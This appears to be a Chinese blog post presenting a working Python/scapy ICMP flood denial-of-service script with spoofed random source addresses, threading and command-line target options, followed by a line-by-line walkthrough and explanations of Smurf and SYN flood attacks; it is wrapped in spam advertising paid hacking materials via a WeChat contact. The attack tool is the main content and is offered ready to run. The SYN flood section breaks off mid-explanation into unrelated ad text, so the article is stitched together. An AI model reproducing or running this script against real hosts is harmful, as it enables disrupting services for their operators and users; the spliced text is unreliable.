python网络渗透之:DOS攻击篇_ddos攻击脚本

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话,可以联系领取~

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

2️⃣视频配套工具&国内外网安书籍、文档
① 工具

② 视频

image1

③ 书籍

image2

资源较为敏感,未展示全面,需要的最下面获取

在这里插入图片描述在这里插入图片描述

② 简历模板

在这里插入图片描述

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

我们来看看效果:

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

可以看到,随着我们发的包越来越多,iftop的检测数据的条也就越来越长,相应的数据大小也有明显的变化。

以下是改进之后的ICMP Flood DOS python代码:

from scapy.all import *;
from scapy.layers.inet import *
from random import randint,choice
from threading import Thread
import time

data_package_number = 0

class IFD():
    def __init__(self):
        pass
    def icmp_dos_log(self):
        log ="""
          ___ ____ __  __ ____    ____   ___  ____     options:
         |_ _/ ___|  \/  |  _ \  |  _ \ / _ \/ ___|      --appoint ip:
          | | |   | |\/| | |_) | | | | | | | \___ \\              -d >> -d[objective ip]
          | | |___| |  | |  __/  | |_| | |_| |___) |     --appoint send package number(recommend even):
         |___\____|_|  |_|_|     |____/ \___/|____/               -o >> -o[number]
            -------------------------------
            version: v_1.1 developer: hare
            -------------------------------
        """
        return log

    def create_ip(self):
        from ipaddress import ip_network
        self.ip_pool = []
        r_ip = ip_network(f"{randint(0,255)}.{randint(0,255)}.{randint(0,255)}.0/24")
        for ip in r_ip:
            self.ip_pool.append(ip)
        return str(choice(self.ip_pool))

    def send_data_package(self,ip_dst,sp_num):
        global data_package_number
        sp_num = int(int(sp_num)/2)
        # ip_src = self.create_ip()
        for i in range(sp_num):
            ip_src = self.create_ip()
            data_package = IP(src = ip_src , dst = ip_dst , id = randint(1000,2000))/ICMP(id = randint(1000,2000) , seq = randint(1000,2000))
            send(data_package,verbose=False)
            print(f"[+]rip:{ip_src}--->dip:{ip_dst} Ok !")
            data_package_number+=1
        if sp_num%2 != 0:
            ip_src = self.create_ip()
            data_package = IP(src=ip_src, dst=ip_dst, id=randint(1000, 2000)) / ICMP(id=randint(1000, 2000),seq=randint(1000, 2000))
            send(data_package, verbose=False)
            print(f"[+]rip:{ip_src}--->dip:{ip_dst} Ok !")
            data_package_number += 1


def main():
    import sys
    icmp_flood_dos = IFD()
    print(icmp_flood_dos.icmp_dos_log())
    try:
        if sys.argv[1] == "-d" and sys.argv[3] == "-o":
            time_1 = time.time()
            thread_pool = []
            for thread in range(2):
                dos_thread = Thread(target=icmp_flood_dos.send_data_package,args=(sys.argv[2],sys.argv[4]))
                dos_thread.start()
                thread_pool.append(dos_thread)
            for tp in thread_pool:
                tp.join()
            time_2 = time.time()
            times = time_2-time_1
            print(f"\r\n[*]The runtime of this attack is:({times}) second !")
            print("[+]data package number is: ",data_package_number)
        else:
            print("[Error Type] options type is error !")
            time.sleep(1)
    except:
        if len(sys.argv) == 1:
            pass
        else:
            print("[Error Options] options is error !")
            time.sleep(1)
if __name__ == '__main__':
    main()
    time.sleep(2)

下面给出代码的解析:

一、 导入需要的库

from scapy.all import *;
from scapy.layers.inet import *
from random import randint,choice
from threading import Thread
import time

二、定义一个类IFD,包含icmp_dos_log()、create_ip()和send_data_package()三个方法

class IFD():
    def __init__(self):
        pass
    def icmp_dos_log(self):
        # 返回攻击脚本的log界面及使用说明
        log ="""
          ___ ____ __  __ ____    ____   ___  ____     options:
         |_ _/ ___|  \/  |  _ \  |  _ \ / _ \/ ___|      --appoint ip:
          | | |   | |\/| | |_) | | | | | | | \___ \\              -d >> -d[objective ip]
          | | |___| |  | |  __/  | |_| | |_| |___) |     --appoint send package number(recommend even):
         |___\____|_|  |_|_|     |____/ \___/|____/               -o >> -o[number]
            -------------------------------
            version: v_1.1 developer: hare
            -------------------------------
        """
        return log

	# 随机生成源IP地址
    def create_ip(self):
        from ipaddress import ip_network
        self.ip_pool = []
        r_ip = ip_network(f"{randint(0,255)}.{randint(0,255)}.{randint(0,255)}.0/24")
        for ip in r_ip:
            # 将生成的IP网络地址池加入到ip_pool列表中
            self.ip_pool.append(ip)
        # 返回随机选择的IP地址
        return str(choice(self.ip_pool))

    def send_data_package(self,ip_dst,sp_num):
        global data_package_number
        # 将要发送的数据包数量除以2,因为会有两个线程分别发送,为了避免重复,每个线程发送数据包数量为总数的一半。
        sp_num = int(int(sp_num)/2)
        for i in range(sp_num):
			#调用create_ip生成源ip地址,使每次发包产生不同的源ip地址
            ip_src = self.create_ip()
            # 构造ICMP数据包
            data_package = IP(src = ip_src , dst = ip_dst , id = randint(1000,2000))/ICMP(id = randint(1000,2000) , seq = randint(1000,2000))
            # 发送数据包
            send(data_package,verbose=False)
            # 打印发送成功信息
            print(f"[+]rip:{ip_src}--->dip:{ip_dst} Ok !")
            data_package_number+=1
        # 若数据包数量为奇数,则再发送一份数据包(即多发送一次)
        if sp_num%2 != 0:
            ip_src = self.create_ip()
            data_package = IP(src=ip_src, dst=ip_dst, id=randint(1000, 2000)) / ICMP(id=randint(1000, 2000),seq=randint(1000, 2000))
            send(data_package, verbose=False)
            print(f"[+]rip:{ip_src}--->dip:{ip_dst} Ok !")
            data_package_number += 1

三、定义主函数main()

	def main():
	    import sys
	    icmp_flood_dos = IFD()
	    # 打印攻击脚本的log界面及使用说明
	    print(icmp_flood_dos.icmp_dos_log())
	    try:
	        if sys.argv[1] == "-d" and sys.argv[3] == "-o":
	            # 开始计时
	            time_1 = time.time()
	            thread_pool = []
	            # 创建两个线程分别发送数据包
	            for thread in range(2):
	                dos_thread = Thread(target=icmp_flood_dos.send_data_package,args=(sys.argv[2],sys.argv[4]))
	                dos_thread.start()
	                # 将两个线程加入到线程池中
	                thread_pool.append(dos_thread)
	            # 等待两个线程执行完毕
	            for tp in thread_pool:
	                tp.join()
	            # 结束计时
	            time_2 = time.time()
	            times = time_2-time_1
	            # 打印攻击所用时间和发送数据包数量
	            print(f"\r\n[*]The runtime of this attack is:({times})

效果如图所示:

在这里插入图片描述

在这里插入图片描述

扩展介绍:Smurf攻击(ICMP放大反射)

Smurf攻击是旨在通过发送大量伪造的ICMP回应数据报给一个或多个目标IP地址来使其宕机。这种攻击方式得名于使用了一种叫做“Smurf程序”的工具。Smurf攻击就是属于DDOS攻击的一种。

Smurf攻击的原理是利用了ICMP Echo Request消息(即Ping请求),当有大量的Echo Request消息被发送到网上广播地址(Broadcast Address),所有收到此消息的主机都会向源IP地址回复并返回ICMP Echo Reply消息(即Ping响应)。如果攻击者将源IP地址设置为目标IP地址,那么目标主机就会接收到所有由网络中的主机发出的Ping响应流量,从而导致目标主机因为过多的Ping响应而无法正常工作,甚至可能导致系统崩溃。因此我们称这种攻击也叫ICMP放大反射攻击。我们可以通过一张图片来简要了解Smurf攻击:‘

在这里插入图片描述

Smurf攻击可以轻易地实现分布式攻击,只需要攻击者控制一些感染了Smurf程序的“僵尸”计算机,然后协同这些计算机一起对目标进行攻击。这种攻击方式不仅容易发动,而且攻击效果也非常显著,因此Smurf攻击曾经在过去的网络攻击事件中频繁出现,但随着防御技术的提高和安全意识的增强,Smurf攻击已经逐渐减少。


TCP SYN Flood DOS

我们先来介绍以下什么是“TCP SYN Flood DOS”:

  • TCP SYN Flood DOS也可以叫做“TCP SYN攻击”,这种攻击实质上是利用了TCP协议的漏洞也就是TCP连接中的“三次握手”中的漏洞来进行攻击的。攻击者通过发送大量的“SYN”连接请求,使目标主机对各个请求发送“SYN+ACK”的请求加响应,然后攻击者对目标主机的ACK请求不做对应的响应(攻击者通常将源IP伪装成不可达的IP)使得目标主机重复发送ACK给攻击者,由于攻击者发送了大量的这种TCP连接,而每一次都无法完成三次握手,在服务器上,这些TCP连接会因为“挂起状态”而消耗CPU和内存,最后服务器可能死机,就无法为正常用户提供服务了,同时我们也称这种连接叫做“SYN半连接状态”。

对于不太了解TCP三次握手四次挥手的读者,可以参考我的《网络通信之:TCP三次握手四次挥手》这篇文章

善意的TCP三次握手连接是这样的:

在这里插入图片描述

恶意的TCP三次握手连接是这样的:

在这里插入图片描述

我们再详细的谈谈攻击者是如何让目标主机拒绝服务的:

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

  • 29
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值